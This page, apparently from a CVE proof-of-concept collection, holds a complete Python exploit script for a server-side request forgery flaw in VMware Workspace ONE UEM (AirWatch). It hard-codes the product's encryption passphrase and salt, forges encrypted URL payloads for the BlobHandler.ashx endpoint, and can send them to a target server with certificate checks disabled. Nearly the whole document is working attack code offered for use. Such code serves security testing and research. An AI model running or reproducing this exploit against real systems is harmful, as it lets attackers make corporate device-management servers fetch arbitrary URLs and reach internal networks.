4837 Total CVEs
26 Years
GitHub
README.md
Rendering markdown...
POC / ssrf.py PY
from Crypto.Cipher import AES
from Crypto import Random
from Crypto.Protocol.KDF import PBKDF2
import base64, sys, argparse, requests
from urllib.parse import urljoin

from requests.packages.urllib3.exceptions import InsecureRequestWarning
requests.packages.urllib3.disable_warnings(InsecureRequestWarning)
requests.packages.urllib3.util.ssl_.DEFAULT_CIPHERS += ':HIGH:!DH:!aNULL'

#https://stackoverflow.com/a/41041028/13886183
try:
    requests.packages.urllib3.contrib.pyopenssl.util.ssl_.DEFAULT_CIPHERS += ':HIGH:!DH:!aNULL'
except AttributeError:
    pass

class SSRFCrypto:
    def getKey(self):
        if self.Key == None:
            self.Key = PBKDF2(self.PassPhrase, self.SaltValue, self.KeySize // 8, count=self.PasswordIterations)

        return self.Key

    def __init__(self):
        self.PassPhrase = '5c5e2c554f4f644b54383127495b356d7b36714e4b214a6967492657290123a0'
        self.SaltValue = 's@1tValue'
        self.KeySize = 256
        self.KeyVersion = 'kv0'
        self.CryptoVersion = 'awev2'
        self.PasswordIterations = 200000


        self.Key = None

    def getIV(self):
        return Random.new().read(12)

    def encryptWithKeyIv(self, text, key, iv):
        aesCipher = AES.new(key, AES.MODE_GCM, iv)

        ciphertext, tag = aesCipher.encrypt_and_digest(text)

        r = chr(len(tag)).encode() + tag + ciphertext

        return chr(len(tag)).encode() + tag + ciphertext

    def decryptWithKeyIv(self, payload, key, iv):
        
        tagLen = payload[0]
        if tagLen > 0:
            tag = payload[1:tagLen + 1]

            payload = payload[tagLen + 1:]

            aesCipher = AES.new(key, AES.MODE_GCM, iv)
            return aesCipher.decrypt_and_verify(payload, tag)
        
        return None

    def EncryptString(self, text):
        iv = self.getIV()

        key = self.getKey()
        payload = self.encryptWithKeyIv(text.encode(), key, iv)

        payload = base64.b64encode(payload).decode()

        payload = "{0}:{1}:{2}:{3}".format(self.CryptoVersion, self.KeyVersion, base64.b64encode(iv).decode(), payload)
        
        payload = list(payload.encode())

        
        unicode_arr = []
        for i in payload:
            unicode_arr.append(i)
            unicode_arr.append(0)

        return base64.b64encode(bytearray(unicode_arr)).decode()


    def normalize(self, arr):
        ret = []

        for i in list(arr):
            if i == 0:
                continue

            ret.append(i)

        return bytearray(ret).decode()

    def DecryptString(self, payload):

        try:
            payload = self.normalize(base64.b64decode(payload))
        except Exception as e:
            print('payload:', e)
            return None

        if payload.count(':') != 3:
            return None

        cryptoVersion, keyVersion, iv, cipher = payload.split(':')

        if len(cryptoVersion) < 1 or len(keyVersion) < 1 or len(iv) < 1 or len(cipher) < 1:
            return None

        if self.CryptoVersion != cryptoVersion:
            print('Invalid CryptoVersion')
            return None

        
        if self.KeyVersion != keyVersion:
            print('Invalid KeyVersion')
            return None

        try:
            iv = base64.b64decode(iv.encode())
        except Exception as e:
            print('IV:', e)
            return None
        

        if len(iv) != 12:
            print('Invalid IV')
            return None

       
        try:
            cipher = base64.b64decode(cipher.encode())
        except Exception as e:
            print('Cipher:', e)
            return None
        
        return self.decryptWithKeyIv(cipher, self.getKey(), iv).decode()

def generate_url(baseurl, payload, airwatch):
    return urljoin(baseurl, ('/AirWatch/BlobHandler.ashx?Url=' if airwatch else '/Catalog/BlobHandler.ashx?Url=') + payload)
    

def request_url(url, timeout=30, proxy=None, debug=None, method='GET', data=None, headers={}):
    try:
        if 'user-agent' not in headers:
            headers['user-agent'] = 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.198 Safari/537.36'

        res = requests.request(method, url, headers=headers, data=data, timeout=timeout, verify=False, allow_redirects=False, proxies=({'http': proxy, 'https': proxy} if proxy else None))

        if debug:
            print('HTTP/1.1 {0} {1}'.format(res.status_code, res.reason))

            for key in res.headers:
                print('{0}: {1}'.format(key, res.headers[key]))

            print()
        print(res.text)
    except Exception as e:
        print(e)

class Extender(argparse.Action):
    def __call__(self,parser,namespace,values,option_strings=None):
        #Need None here incase `argparse.SUPPRESS` was supplied for `dest`
        dest = getattr(namespace,self.dest,None) 
        #print dest,self.default,values,option_strings
        if(not hasattr(dest,'extend') or dest == self.default):
            dest = []
            setattr(namespace,self.dest,dest)
            #if default isn't set to None, this method might be called
            # with the default as `values` for other arguements which
            # share this destination.
            parser.set_defaults(**{self.dest:None}) 

        try:
            dest.extend(values)
        except ValueError:
            dest.append(values)



def parse_headers(headers):
    ret = {}
    if headers:
        for i in headers:
            t = i.split(':')
            if len(t) == 2 and len(t[0]) > 0 and len(t[1]) > 0:
                ret[t[0].lower().replace(' ', '')] = t[1][1:] if t[1].startswith(' ') else t[1]

    return ret

def main():

    #Based in assetnote script
    # https://blog.assetnote.io/2022/04/27/vmware-workspace-one-uem-ssrf/

    
    argparser = argparse.ArgumentParser()

    argparser.add_argument("--url", help="AirWatch URL (i.e. https://mdm.corp.evilcorp.com)")
    argparser.add_argument("--ssrf", help="SSRF URL (i.e. https://example.com", default='https://example.com')

    argparser.add_argument("--airwatch", help="Use Airwatch route instead of Catalog",  action='store_true')
    argparser.add_argument("--request", help="Request the SSRF URL after generating", action='store_true')
    argparser.add_argument('--proxy', help='Use proxy, ex: --proxy=http://127.0.0.1:8080', type=str)
    argparser.add_argument('--decrypt', help='Decrypt payload', type=str)
    argparser.add_argument('--timeout', help='Http timeout request', type=int, default=15)
    argparser.add_argument("--debug-headers", help="View http response headers", action='store_true')
    argparser.add_argument('--method', help='HTTP method to send', default='GET', type=str)
    argparser.add_argument('--data', help='Send body', type=str)
    
    argparser.add_argument('-H', '--header', help='Send headers', type=str, nargs='*', action=Extender)

    args = argparser.parse_args()
    
    if len(sys.argv) < 2:
        return argparser.print_help()

    vwc = SSRFCrypto()

    if args.decrypt:
        r = vwc.DecryptString(args.decrypt)
        if r != None:
            print('Result:')
            print(r)

        return

    if not args.url:
        return argparser.print_help()

    payload = vwc.EncryptString(args.ssrf)

    url = generate_url(args.url, payload, args.airwatch)



    print('Generated SSRF payload:')
    print(url + '\n')

    if args.request:
        headers = parse_headers(args.header)
        method = args.method.lower()

        if method not in ['head', 'trace', 'options', 'delete', 'put', 'post', 'get']:
            method = 'get'

        request_url(url, args.timeout, args.proxy, args.debug_headers, method=args.method, headers=headers, data=args.data)

if __name__ == '__main__':
    main()